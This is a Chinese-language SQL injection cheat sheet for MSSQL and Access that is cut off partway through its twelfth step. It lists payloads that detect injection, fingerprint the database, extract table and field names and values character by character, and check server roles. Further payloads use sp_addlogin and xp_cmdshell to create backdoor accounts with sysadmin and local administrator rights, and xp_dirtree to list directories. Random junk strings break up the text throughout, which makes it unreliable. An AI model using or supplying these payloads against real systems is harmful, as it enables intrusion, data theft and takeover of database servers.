1.判断是否有注入;and 1=1 ;and 1=2 1,`x1dcO!A
2.初步判断是否是mssql ;and user>0 |I+E`,n"b
|_2ANWHz
3.注入参数是字符'and [查询条件] and ''=' Q84KU8?d
W{m0z+N[B
4.搜索时没过滤参数的'and [查询条件] and '%25'=' N<> dg
_zmx
5.判断数据库系统 d8RpL{9\7
p
go\(K0
;and (select count(*) from sysobjects)>0 mssql 8rp-XiW
= xX^
;and (select count(*) from msysobjects)>0 access BK d(
\
bT]?.si
EJtU(HmW
Z#MODf0H@
6.猜数据库 ;and (select Count(*) from [数据库名])>0 'HcDl@E
5!ReW39c;
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 /?XfVhA:A
=OZ_\vO
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 C${TC+z
r&3fSx9
9.(1)猜字段的ascii值(access) 2aje$w-
i)(QNpv
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ycAQPz}=I
'qd")
(2)猜字段的ascii值(mssql) ]VYl Eqe
-% fDfjP
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 cT0g, ^&
}t-r:R$,
10.测试权限结构(mssql) M7>\Qk
iRVLo~
%-'U9e KN
6HqK%(
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- YYvs~?bAy
99:L#0!.W
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- }b^lg&$(
^c7L!F
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ]Ojt3)fB
sk3;;<H
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 0?h .X=G
J;kbY9e
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- jw[`_
O46/[{p+8
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Elq8WtS
4QVd{
;and 1=(select IS_MEMBER('db_owner'));-- M1M]]fT0ME
8Z!ea3kAT
K/,lw~>
mDmWTq\
11.添加mssql和系统的帐户 r4lG 5dV
|5/[0V-vy
;exec master.dbo.sp_addlogin username;-- n{yjH*\Z
;exec master.dbo.sp_password null,username,password;-- *sG<w%%
-/qrEKQ0U?
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- FTenXJ/c
o <'gM]$
;exec master.dbo.xp_cmdshell 'net user username password ]/']{*T1
D_)vGvv3;.
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- T:&+#0<
N.`]D)57
;exec master.dbo.xp_cmdshell 'net user username password /add';-- @&W?e?O ~G
C(P$,;6
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ~<U3KB
t}FMBGo[
{L eEnh-
k
WtUj
12.(1)遍历目录 >dl!Ep
K]oPh:E
;create table dirs(paths varchar(100), id int) ]
6gu
rh_({rvQ
;insert dirs exec master.dbo.xp_dirtree 'c:\' <Gw<